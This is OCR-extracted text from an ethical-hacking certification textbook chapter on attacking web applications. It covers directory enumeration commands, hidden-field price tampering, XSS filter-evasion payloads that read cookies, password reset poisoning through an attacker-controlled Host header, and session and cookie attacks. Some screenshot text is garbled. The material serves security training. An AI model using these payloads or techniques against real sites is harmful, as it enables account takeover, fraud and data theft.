addresses, account IDs, web framework modules, SQL errors, and more.

Figure 14.S7: Screenshot showing output of WhatWeb

Identify Server-Side Functionality

After determining the server-side technologies, attackers try to identify the server-side
functionality to find potential vulnerabilities. They examine the page source and URLs and make
educated guesses to determine the internal structure and functionality of web applications.
They use the following tools to do so.
■ GNU Wget

Source: https://www.gnu.org
GNU Wget is employed for retrieving files using HTTP, HTTPS, and FTP, which are the
most widely used Internet protocols. It is a non-interactive command-line tool; hence, it
can be called from scripts, cron jobs, and terminals without X-Windows support.

Module 14 Page 2014 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Figure 14.58: Screenshot displaying GNU Wget command-line utility tool

• BlackWidow (http://softbytelabs.com)
■ curl (https;//curl.se)
■ Examine URL
An SSL certified page URL starts with https instead of http. If a page contains a .aspx
extension, the application is likely written using ASP.NET. If the query string has a
parameter named showBY, then you can assume that the application is using a database
and will display the data by that value.
SSL ASPX Platform
~ ~

https //www.certifiedhacker.com/customers.aspx?name=existing%20clients&isActive=
0&startDate=20 %2Fll %2F2020&endDate=20 %2F04 %2F2022&showBy=name

: 'y'
·•· ······•····· ·••············➔ Database Column ~·······························=
Figure 14.59: Identify Server-Side Functionality by examining URL

Identify Files and Directories

Attackers use various techniques and tools to enumerate applications, hidden directories, and
files of the web application hosted on web servers that are exposed on the Internet. They use
tools such as Gobuster and URL Fuzzer and the Nmap NSE script http-enum to identify files and
directories of the target web application.

Module 14 Page 2015 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Gobuster
Source: https://github.com
Gobuster is a Go-programming-based directory scanner that allows attackers to perform
fast-paced enumeration of hidden files and directories of a target web application. It is a
command-oriented tool used to brute-force URls in websites, DNS subdomains, names
of virtual hosts on the target server, etc.
Run the following command to retrieve file and directory names and their status codes:
gobuster -u <target URL> -w common.txt

Figure 14.60: Screenshot show ing t he output of Gobuster tool

Module 14 Page 2016 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Use the -s flag to retrieve files and directories related to specific status codes:
gobuster -u <target URL> -w common.txt -s 200

Figure 14.61: Screenshot show ing the output of Gobuster tool

Similarly, the -q and -n flags can provide a quick view of the directories without banner
and status codes. You can also output the result to an output file using the -o flag.

Module 14 Page 2017 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Nmap
Source: https://nmap.org
Attackers use the Nmap NSE script http-enum to enumerate applications, directories
and files of web servers that are exposed on the Internet. Thus, they can identify critical
security vulnerabilities in the target web application.
Run the following Nmap command to gather information about the exposed files and
directories of the target web server:
nmap -sV --script=http-enum <target domain or IP address>

Figure 14.62: Screenshot of Nmap command

Identify Web Application Vulnerabilities

Attackers use various techniques to detect vulnerabilities in target web applications hosted on
web servers to gain administrator-level access to the server or retrieve sensitive information
stored on the server. They scan applications for identifying vulnerabilities and detect attack
surfaces on the target applications. Performing comprehensive vulnerability scanning can
disclose security flaws associated with executables, binaries, and technologies used in a web
application. Through vulnerability scanning, attackers can also catalog different vulnerabilities,
prioritize them based on their threat levels, and use them while targeting an application.
Attackers can use tools such as Vega, WPScan Vulnerability Database, Arachni, and Uniscan to
identify vulnerabilities in the target web applications.

Module 14 Page 2018 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Vega
Source: https://www.subgraph.com
Vega is a free and open-source web security scanner and web security testing platform
for testing the security of web applications. Vega helps you to find and validate SQL
injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and
other vulnerabilities. It is written in Java and is GUI-based, and it runs on Linux, OS X,
and Windows. Vega also helps you to find vulnerabilities such as reflected cross-site
scripting, stored cross-site scripting, blind SQL injection, remote file include, shell
injection, and others. It also probes TLS/SSL security settings and identifies opportunities
for improving the security of your TLS servers.

0 Subgraph Veg, OI X
file Scan Window t!elp

0 Scanner ii, Proxy

7
Cl Website View e:::i O © Scan Info[
--{i}~--~----,,£--8--;
> CIA 10.10.1.22
> Cl
> Cl
> CIA
> CIA
0VEGA
> Cl
> Cl
> Cl
> CIA Scan Alert Summary
a
0 Scan Alerts CD O a =□ 0 High (3 found)
>0 04/19/2022 02'31,09 ICompleted) (13)
Session Cookie Without St:cure Flag
Session Cookie Without HttpOnly Flag
Cleartat Password over HTTP

0 Medium (2 found)

HTTP Trace Support Detected

Local Fitesystem Paths Found

0 Low (6 found)

Directory listing Oetr:cted

O lnfo (2 found)

HTTP Error O~ected

.&a. Identities t3 j
~ Proxy is not running

Figure 14.63: Scree nshot of Vega

Some additional web application scanning tools are as follows:

■ WPScan Vulnerability Database (https://wpscan.com)
■ Arachni (https://www.arachni-scanner.com)
■ appspider (https://www.rapid7.com)
■ Uniscan (https://sourceforge.net)

Module 14 Page 2019 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Map the Attack Surface

Once the attackers detect the entry points, server-side technologies, and functionalities, they
can find their respective vulnerabilities and map the attack surface area of the target web
application. Web application analysis thus helps attackers reduce their attack surface. Attackers
consider the following factors in planning their attack.

Information Attack
Client-Side Validation Injection Attack, Authentication Attack
Database Interaction SQL Injection, Data Leakage
File Upload and Download Directory Traversal
Display of User-Supplied Data Cross-Site Scripting
Dynamic Redirects Redirection, Header Injection
Login Username Enumeration, Password Brute-Force
Session State Session Hijacking, Session Fixation
Injection Attack Privilege Escalation, Access Controls
Cleartext Communication Data Theft, Session Hijacking
Error Message Information Leakage
Email Interaction Email Injection
Application Code Buffer Overflows
Third-Party Application Known Vulnerabilities Exploitation
Web Server Software Known Vulnerabilities Exploitation

Table 14.2: Table showing information and respective attacks

Module 14 Page 2020 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bypass Client-side Controls

A web application requires client-side controls to prevent user inputs from affecting data transmission via client
components and to implement measures that control a user's interaction with his or her own client

Web developers often think that the data transmitted from the client to server is under control by the user, and
this assumption can make applications vulnerable to various attacks

11.ttack Hidden
Form Fields
e Identify hidden form fields in a web page and manipulate its tags and fi elds to exploit the web page
before it transmits data to the server
J
11.ttack Browser
Extensions

Perform Source
e Attempt to intercept the traffic from browser extensions or decompile the browser extensions to
capture user data

e Perform a source code review to identify vulnerabilities in the code that cannot be identified by
J
Code Review traditional vulnerability scanning tools

e Evade XSS filters by injecting unusual characters into the HTML code

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Bypass Client-side Controls: Attack Hidden Form Fields

In any e-commerce/retailing web applications, the developer flags certain fields like product name, and product
price as hidden to prevent the user from viewing and modifying the fields

In every client session, developers use hidden fields t o store client information, including product prices and
discount ra tes

.J To exploit such vulnerable web applications, save the source code for the HTML page, tamper the price values
by editing the price field 's value, and reload the source into a browser. The Buy button can then be clicked to
buy the product at the edited price

You can also attempt to provide negative values in the price field to get a refund from the application

77' COpynght Cl by EC-CIUDl:11 All Rights Reserved Reproduction ls Strictly Proh1b1ted

Module 14 Page 2021 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bypass Client-side Controls: Attack Browser Extensions

Capturing data from a web application that uses browser extension components can be achieved by two methods

Intercepting Traffic from Decompiling Browser

Browser Extensions Extensions

Attempt to intercept and modify requests made
by the component as well as responses from the
server
Use tools like Burp Suite to capture the data
In this technique, you can attempt to decompile the
component's bytecode to view its detailed source,
which allows you to identify detailed information of
the component functionality
The main advantage of this technique is that it allows
you to modify data present in the requests that are
sent to the server, regardless of any mechanisms
employed to obfuscate or encrypt the transmitted
data

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Bypass Client-side Controls: Attack Google Chrome Browser

Extensions
Attackers first lu re victims into down loading a □ X
malicious file or prompt them to visit a malicious
X +
website so that they can easily infect the target
browser
e Clvoffl•
* Iii • e
Aftermalware has been installed, the browser = Extenaiona Q. - - . , . made • •
forces users to perform specifi c actions such as
activating extensions and allowing permissions l DMunpK• N J>acktirt~1,,1on Upclato
to exfi ltrate data

Attackers may target the Chrome Sync feature,

which allows a smooth browsing experience for
Fa,oepa,nt Endpoint fa, V,IOdows 2.0 50
users across multiple platforms
f ~ t Endpoint Cm>mo f>'tem!Gn la,
Leveraging this feature on the compromise d Wndo-i.s
browser, attackers can add fake or malicious
extensions that appear to be legitimate
D fmliNcbjld<Nmpollnl!~
Using this technique attackers can gather stored
information on the browser such as autofill
information, bookmarked data, search history, R-.e C
passwords, configuration settings, and other
synchron ized data

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2022 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bypass Client-side Controls: Perform Source Code Review

Examine the web application source code and understand the working of components in the
code to identify the following functionalities of the components:
-••
0 Client-side input validation
e Employed obfuscation or encryption techniques
on transmitted data

e Modifiable components with hidden client-side

functionality 8 References to server-side functionality

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Bypass Client-side Controls: Evade XSS Filters

Encoding Characters Embedding Whitespaces Manipulating Tags

Many characters in HTML elements
can be written in ASCII codes to
evade filters that search for strings
such as <javascript>:
<a href=
" &#106 ; avascript : alert( ' XSS
Successful ' ) " > Click
Here!</a>
Use hexadecimal encoding to
bypass filters that search for HTML
elements by scanning for&# along
with numeric characters:
<a
href=" &#6A ; avascript:alert(
d o cume nt. cookie) "> Clic k
Here!</a>
Use tab spaces to evade detection:
<img src=" java script:al
ert ( 'Successful XSS') ">
You can also encode the tab spaces:
<img
src=" java&#x09 ; script:al&#x
09;ert ('Successful XSS') " >
You can also encode using carriage
ret urn and new line charact ers:
<img
src=" java&#x09 ; script:al&#x
09;ert('Successful XSS ' ) ">
You can em bed a <script> tag
within <script>:
<scr<script>ipt>document.wr
ite( " Successful
XSS " ) < /scr<script>ipt>
Separate attributes and tags with a
sla sh in an HTML element:
<img/src=" popup.jpg" onload=
&#x6A ; avascript:eva l(alert(
'Successful&#32XSS ' ))>
Use abnormal tag inputs to bypass
filters:
<a
onmousedown= alert(document.
c ookie )> vis i t xyz .com</a>

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Bypass Client-side Controls

A web application requires client-side controls to restrict user inputs when transmitting data via
client components and implementing measures to control the user's interaction with his or her
own client. A developer uses techniques such as hidden HTML form fields, and browser
extensions to allow the transmission of data to the server via the client. Often, web developers
assume that the data transmitted from the client to the server is within the user's control, and
this assumption can make the application vulnerable to various attacks.

Module 14 Page 2023 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Some of the techniques to bypass the client-side controls are as follows:

■ Attack Hidden Form Fields: Identify hidden form fields on the web page and manipulate
the tags and fields to exploit the web page before transmitting the data to the server.
■ Attack Browser Extensions: Attempt to intercept the traffic from the browser
extensions or decompile the browser extensions to capture user data.
■ Perform Source Code Review: Perform source code review to identify vulnerabilities in
the code that cannot be identified by traditional vulnerability scanning tools.
■ Evade XSS Filters: Evade XSS filters by injecting unusual characters into the HTML code.

Attack Hidden Form Fields

E-commerce/retailing web applications use hidden HTML form fields to restrict the user to
view/modify data fields such as "products" and "prices of products" and allow the user to enter
certain fields such as "quantity," assuming that the user enters the required quantity before
submitting the data to the server. The developer flags these fields as hidden to restrict the user
from modifying them. In every client session, developers use hidden fields to store client
information, including product prices and discount rates.
Follow the process described below to attack hidden form fields:
■ Identify vulnerable web applications
■ Save the source code for the HTML page
■ Locate the hidden field
■ Tamper with the price values by editing the price field's value
■ Save the file and reload the source into a browser
■ Click the Buy button
The request will be transmitted to the server with the modified price. You can also use proxy
tools such as Burp Suite to trap the request that submits the form and modify the price field to
any value. In addition, you can attempt to enter negative price values to trick the retail
application into refunding the amount through credit card transactions.
Attack Browser Extensions

The data from a web application that uses browser extension components can be captured by
two methods:
■ Intercepting Traffic from Browser Extensions
Attempt to intercept and modify the request and response of the component and th e
server, respectively. You can use tools such as Burp Suite to capture the data. This
method has certain limitations such as dat a obfuscation or encryption, and secure dat a
serialization.
■ Decompiling Browser Extensions

Using this technique, you can attempt to decompile the component's bytecode to view
its deta iled source, which allows you to identify the detailed information of th e

Module 14 Page 2024 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

component functionality. The main advantage of this technique is that it allows you to
modify data present in the requests that are sent to the server, regardless of any
obfuscation or encryption mechanisms employed for the transmitted data.
You can use proxy tools such as Burp Suite to capture and modify the web page
component requests. In the context of bypassing client-side input validation that is
implemented in a browser extension, if the component submits the validated data to
the server transparently, this data can be modified using an intercepting proxy in the
same way as that described for HTML form data.
Attack Google Chrome Browser Extensions
To compromise any web browser, attackers first lure victims into downloading a malicious file
or prompt them to visit a malicious website so that they can easily infect the target browser.
After malware has been installed, the browser forces users to perform specific actions such as
activating extensions and allowing permissions to exfiltrate data.
For example, in the context of Google Chrome, attackers may target the Chrome Sync feature,
which allows a smooth browsing experience for users across multiple platforms. Leveraging this
feature on the compromised browser, attackers can add fake or malicious extensions that
appear to be legitimate, through which they can gather stored information on the browser such
as autofill information, bookmarked data, search history, passwords, configuration settings, and
other synchronized data.
The following screenshot shows the installation of a fake extension called Forcepoint from a
compromised browser, which can be used to exfiltrate the synced data from the user device to
a remote attacker.

□ X
X +
* (ii • e
= Extenaiona 0.. OWek>per modi ..

PK mffl~on

FortfP(llfll El>Clp<kll fOf Yf·nOOWi 2..0 :.0

forcepo!nt End;loln Ctvome utenslon f0<
\Wldov,9

RlmOve C

Figure 14.64: Screenshot of the Google Chrome Forcepoint extension

Module 14 Page 2025 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

The following information can be gathered by attackers after infecting the Google Chrome
browser.
■ User Activity

o User's spoken language

o Most recent sites visited
o Types of media files accessed the most
o Financial transactions through e-commerce sites
o User's trusted contact list and details saved on the browser
o Geo-location
o User device's gyro and proximity sensor data while using GPS
■ User-Created Personal Information

o Username, passwords, identities, financial account details, and contact information

saved on the browser
o Custom browser settings
o Other information such as user reactions to social media posts or files uploaded to
websites
o Data collected from user-account-linked devices
o Device information, applications installed, services used, etc.
■ Other Information

o Files, news, data, and services that are related to the user
o Third-party websites or service providers such as e-commerce sites, social media sites,
research sites, and business service providers
o Cookies, pixel tags, application cache, browser web storage, and server log files
Perform Source Code Review

Attempt to acquire the source code of the target web application. After acquiring the source
code, examine the code to understand the components, frameworks, etc., as well as their
working to identify any existing vulnerabilities in the code. This examination can provide
information about various functionalities such as removing client-side input validation,
submitting nonstandard data to the server, manipulating client-side states or events, or directly
invoking functionality that is present within the component.
Perform source code review to identify the following functionalities of a target component:
■ Client-side input validation or other security-related logics and events
■ Obfuscation or encryption techniques that are applied to the client data before it is
transmitted to the server

Module 14 Page 2026 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Modifiable components with hidden client-side functionalities

■ References to server-side functionalities
Evade XSS Filters
XSS filter implementations are applied to web browsers to protect them from imminent XSS
attacks; however, attackers can make them vulnerable by injecting unusual characters into the
HTML code, through which they can evade the filter implementations.
Attackers can embed harmful JavaScript into a web application in many ways. However, the
latest browsers are implemented with strong security measures; hence, the script injection
sometimes fails. Therefore, attackers often try to not only take advantage of application design
flaws but also bypass input evaluation processes conducted by the server or application to trick
complicated browser filters.
XSS attacks usually exploit improper configurations and security implementations of a browser,
whereas filter bypassing methods are carried out by leveraging flaws in a server or browser-side
filters, targeting certain versions or products.
A majority portion of the browser code is written with proper security measures to handle
abnormal HTML, JavaScript, and CSS to fix them before delivery to the end users. XSS filter
bypassing leverages such an intricate composition of specifications, exceptions, languages, and
other browser characteristics to inject scripts through the filters without leaving a trace.
Various XSS filter evasion techniques are discussed below:
Inserting <script> tags into the code is not allowed in a general context. However, some other
HTML tags can permit these unusual injections. Event handlers are employed to run specific
scripts corresponding to the authorized user actions. In general, event handlers such as
<onfocus>, <onerror>, and <onclick> can be exploited to evade XSS filters.
■ Encoding Characters
Attackers can embed various characters in different ways to evade filters that focus on
inspecting text to detect unwanted strings. Approaches for character encoding include
the following:
o A few or all of the characters of HTML elements can be written using ASCII codes to
evade filters that search for strings such as <javascript>:
<a href= "&#106;avascript :alert('XSS Successful ' )"> Click Here!</a>

o Hexadecimal encoding can be used to bypass filters that search for HTML elements
by scanning for&# along with numeric characters:
<a href="&#6A ; avascript:alert(document.cookie)"> Click Here!</a>

o Base64 encoding can be used to cover the tracks of attack code; it pops up an alert
with "Successfu I XSS":
<body onload="eval(atob('U3VjY2Vzc2ZlbCBYU1M=')) ">

Module 14 Page 2027 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

o The embedded character elements are from numbers 1-7, avoiding initial zeros.
Therefore, any composition of zero padding is allowed:
<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">
Click Here!</a>

o XSS payloads can be concealed using character codes:

<iframe src=#
onmouseclick=alert(String . frornCharCode(88,83,83))></iframe>

• Embedding Whitespaces

Browsers allow convenient usage of whitespace characters while writing JavaScript or

HTML code. Thus, attackers can easily evade filters by inserting non-printable
characters.
o Tab spaces are avoided while processing the code; they can be invoked to split
keywords. Consider this <img> tag:
<irng src=" java script : al ert ('Successful XSS') ">

o You can also encode the tab spaces:

<irng src=" java&#x09;script : al&#x09;ert( ' Successful XSS ' ) ">

o Similarly, carriage return and newl ine characters are not considered during
processing; thus, attackers can also encode these characters in between:
<a href = "jav&#xOA ; a
Script:&#xOA ; ale&#xODrt; ( ' Successful
XSS')">Visit xyz.corn</a>

• Manipulating Tags

XSS filter evasion can also be performed by manipulating tags and skipping attributes.
o When the filter inspects the script and deletes certain tags (mostly <script>), placing
them within other tags can leave legitimate code after they are deleted:
<scr<script>ipt>docurnent.write( "Successful XSS " )</scr<script>ipt>

o Attributes and tags can be separated by supplying a slash that helps in bypassing
whitespace restrictions in value insertion:
<irng/src="popup . jpg"onload=&#x6A;avascript:eval(alert('Successful&#3
2XSS ' ))>

o Attackers also exploit browser interpretations and abnormal tag inputs to bypass
filters. The following example shows how to skip the <href> tag:
<a onmousedown=alert(docurnent.cookie)> visit xyz . corn</a>

Module 14 Page 2028 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Authentication Mechanism

Exploit design and implementation flaws in web applications, such as failure to check password strength
or insecure transmission of credentials, to bypass authentication mechanisms

Usernarne Enumeration Password Attacks Session Attacks

8 Verbose failure messages 8 Password functionality exploits 8 Session prediction
8 Predictable usernames e Password guessing e Session brute-forcing
8 Session poisoning
8 Brute-force attack

8 Dictionary attack

8 Attack Password Reset Mechanism

Cookie Exploitation Bypass Authentication
8 Cookie poisoning 8 Bypass SAML-based 550
8 Cookie sniffing
8 Cookie replay

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Design and Implementation Flaws in Authentication Mechanism

1a Bad Passwords
I■ User Impersonation

]11 Brute-Forcible Login

II Improper Validation of Credentials

]11 Verbose Failure Messages

m Predictable Usernames and Passwords

II Insecure Transmission of Credentials

m Insecure Distribution of Credentials

I■ Password Reset Mechanism

Im Fail-Open Login Mechanism

111 Forgotten Password Mechanism

m Flaws in Multistage Login Functionality

111 "Remember Me" Functionality

Im Insecure Storage of Credentials

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2029 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Username Enumeration
If a login error states which part of the username and password is incorrect, guess the users of the application
using the trial-and-error method

@ Wor dPress com \_~ Word Press com

Username successfully enumerated to rinimatthews

Usemame rini.matthews does not exist
l og in to your account
Log in to your account

Email Address o r Username

I rini.matthews
(D User doe s not exist. Would you like to crec1te a
new account?

By continuing , you a gree t o our Terms of SeMCe

Continue
https;//wordpress.com

Some applications automatically generate account usernames based on a sequence (i.e., user101, user102), and
attackers can determine the sequence and enumerate valid usernames

Note: Username enumeration from verbose error messages w ill fail if t he application implements an account lockout policy {i.e., l ocking the
account after a certain number of failed logi n attempts)

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Password Attacks: Password Functionality Exploits

Password Changing
8 Determine password change functionality within the applicat ion by spidering the application or creating a login account

8 Try random strings for 'Old Password', 'New Password', and 'Confirm the New Pas sword' fields and analyze errors to identify
vulnerabilities in password change functionality

Password Recovery
6 "Forgot Pa ssword" features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess
the challenge answer successfully with the help of social engineering
6 Applications may also send a unique recovery URL or existing password to an email address specified by t he attacker if the cha llenge
is solved

'Remember Me' Exploit

e " Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session
identifier such as RememberUser=ABY112010

6 Attackers can use an enumerated use mame or predict the session identifier to bypass authentication mechanisms

COpynght Cl by EC-C1uncil All Rights Re s erve d Reproduction IS Strictly Prohibited

Module 14 Page 2030 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Password Attacks: Password Guessing and Brute-forcing

Password Guessing Brute-forcing

Create a list of possible passwords using common passwords,
footprinting the target and using social engineering techniques,
and try each password unt il the correct password is discovered
Create a dictionary of all possible passwords using tools such as
Try to crack the log-in passwords by trying all possible values
from a set of alphabets, numeric, and special characters
Use password cracking tools such as Burp Suite, L0phtCrack,
and BruteX

___ ______ ________ __.. -

Dictionary Maker to perform dictionary attacks

,.,.,...... ..... .._.,..

, .

Password guessing can be performed manually or by using

automated tools such as THC-Hydra, Burp Suite, LOphtCrack,
ophcrack, and RainbowCrack
......
, ,
-- _
_,_.,............,.,
...........
~
,..,,__,...
...... ........
.. .. __
...........
....,..... •···_· ,., -_,.....
,......,.......,.,.,
...,,.....
................
_

,,,.,. ,)>,_<fWw ,\-• "9'

.., ,_.,,.,_., ...
..,....,.,_,__.,.,
......., _ _
---
-

--•-"·
..... , . _ , " " " " " " _ _.......i...., _

........... ,,,.,.,:z:1._
":;!:,.;:;::;:·.=~!"":--·---·
!._~ -- ,,- ..........« . ..........,..:.-,.ri,.,11:00._ _ _ _ ..._ , . . ,... ,.

<1>® .. ➔

https://portswigger. net

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Password Attacks: Attack Password Reset Mechanism

Steps to perform password reset poisoning attack:

Step 1: Attacker obtains the email address used on the website by the target through techniques such as social engineering,
and OSINT

Step 2: Attacker sends a password reset request link to the victim using the altered Host header

8 For example:

POST https://certifiedhacker.com/reset . php HTTP/1.1

Accept: */*

Content-Type: application/json

Host : badhost .com

e The resultant URL for resetting the password is

https: //badhost . com/ res et-password.php? token=87654321-8765-8765-8765-10987654321

Step 3: The attacker then waits for the victim to receive the modifi ed ema il

Step 4 : Once the victim clicks on the ma licious link embedded in the ema il, the attacker extracts t he pas sword reset token and
performs various malicious activities

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2031 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Session Attacks: Session ID Prediction/Brute-forcing

a In the first step, collect some valid session ID values by sniffing traffic from authenticated use rs

Analyze captured session IDs to determine elements of the session ID generation process such as the session ID structure,
the information that is used to create it, and the encryption or hash algorithm used by the application to protect it

Vulnerable session generation mechanisms that use session IDs composed usi ng predictable information such as username,
t imes tamp, or cl ient IP address, can be exploited easily by guessing valid session IDs

a In addition, you can implement a brute force technique to generate and test different session ID values until you
successfully get access to the application

GET bttp·//jaoai na·8t80/WebGoat/attack 1 Screen-17 & menu=410 HTTP/ 1.1

Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
GET Acce p t: telrt/xml, a pplication/ic:ml, application/xhtml+xml,text/htmtl;q-0.9,text/plain;q=0.8,image/pn g, • ,q=O.S r
Request
Referer: bttp·/ljanaina: 8t80/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=userOl ◄• ••••• •••• ••••• •••• ••••••••••••••••••••••••••••••••••••••• •••••• Predictable Session Cookie
Authorization: Basic Z3Vic3Q6Z3Vlc3Q

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Cookie Exploitation: Cookie Poisoning

\) OWASPl» • OWWWZ.11.1
[le f i91 !6N' B,~1111 IooiS !mPOft Ql'ltinl ljelp
If the cookie contains passwords or Stanurouoo. v !Iii 151 o -1. .1 • • _ a -, ~ D Ii;! & ,,; •
session identifiers, steal the cookie . .... + , ; Quldl:81,n • RtQUISI ~ RnPOnSI ♦

using techniques such as script e oo::i

150.,,.. GU l!ttp,1/-.-1nc-.coa/vie,,,pr-ofjl,r.• 5p-.!l"• I KTlll/ 1.1
injection and eavesdropping :E Ou.11:Coru.ci
IIO~t· -.-1uu,1••·<oa
Us..,.·•1ent: 11,nill•/S. I ( w t - NT II.I; wi"6£, •6'; rY: I N.I) Cie<to/HINIII HrefoatlN.I
w &cupt. te,rtf,-t"1,1ppllutl.,,,,Kl'lt•l •xal,-lic1t ! llfl/xal;O• l.t,iNtc/nl f ,l-Jel•dJc>,•f•,<t<I.I
•cupt•i• nl" . .C: tn•US,en;q. .. S
!llefen1r: 11ttp1 c//---1ncooe.c.,.,lncle•-011•
Then replay the cookie with the Cor-..edlon: 1teep•1Uve
COoll:le •Kooe•J.............
same or altered passwords or UIIIJl'-•iftlUW.-..-•e-n1:1
s«-,etcl,·Dut : OOC-lll
Sec-,etcl,·ltoOr. n,~i.u te
session identifiers to bypass web ~::::::::~!;;;~•od1i11
application authentication

You can trap cookies using tools such

as OWASP Zed Attack Proxy and W HUICIIJ' SNrdl fl! Nlftt ..... +
Burp Suite • It
kl $owu
1• -Pr
"f Rltr"OFF f WOII
RIQ nl!IQ\alnll
5121122.6:JOOIIM,j GET
Md'lod URL C- Rt.Hon Rn SU.Rnp
11 13,IJJD,tll
8odJ H11t11S1Hwt NIM
,- Wt,tum
, ...
20 - Pr ~•.30oeMJ ce,
111D:hWW..-KOoeCOIMMOUffll'W\.II
~ .movltlCOl)l. ~.IO'IPlll ''""'
"""" •t
,,
tU91D!\H
ISOOlt,rl.u
.. l.Ow
IIII LOw
t400tn.SC!llllC
c,,_
c,.,,.,.
21 +-+ Pr
"'""
51".M122,a")OOIIMil GET hlp"#wwwl'IOwieS(l01)1aun.,s/j11,JHJQUl(b
22 - Pr 5'26122.1:JOO&M,j GET •• 18.&&lt;itl ,. L.or,r
2• - Pr M6t21.a3001 MJ CET
llll):1WWW.-sc:o1>1. ~0Ut1Y.ltUll
hlp,._.movltKOpecco,l\lj~"! """"
"""" 1•1
,ms
17089111'191 IIII L.or,r
c,""""'
c,,_
27 _ ,., !mm..6:301)114,j G£T t7.0ltllf!II co-
"'""
hlD:&www.,,_sa,pe ~ U l lill low
21 - Pr ~631:kMil POST hlD.-.movltfCOl)leornl' U 12lll)ttt: lllo LOw
""""" """""
21 - Pr
~7 _
511 -
512t122.fl13,iMil

Pr_ Y26122,6l1 39 Mil GET

GET htll.,,__S(l01)1~.Sllt
Pr_ 5'29Q2.6. 31 l11 Nd POST hll).Jwww_,,_KOl)I.CotrWldlkHPl
hll)ll#wwl'll(Mtt:a1pt comMfwpr. t JSP
"'""
l02 FCIUl'ld
200 CI(
f9 270iJD!\II
7ml 139b)'IH
« 2• 2Nll!'tl
1111 1-tlf!
lill l.Ow
lllo Kltl
Form,Hidoen,S

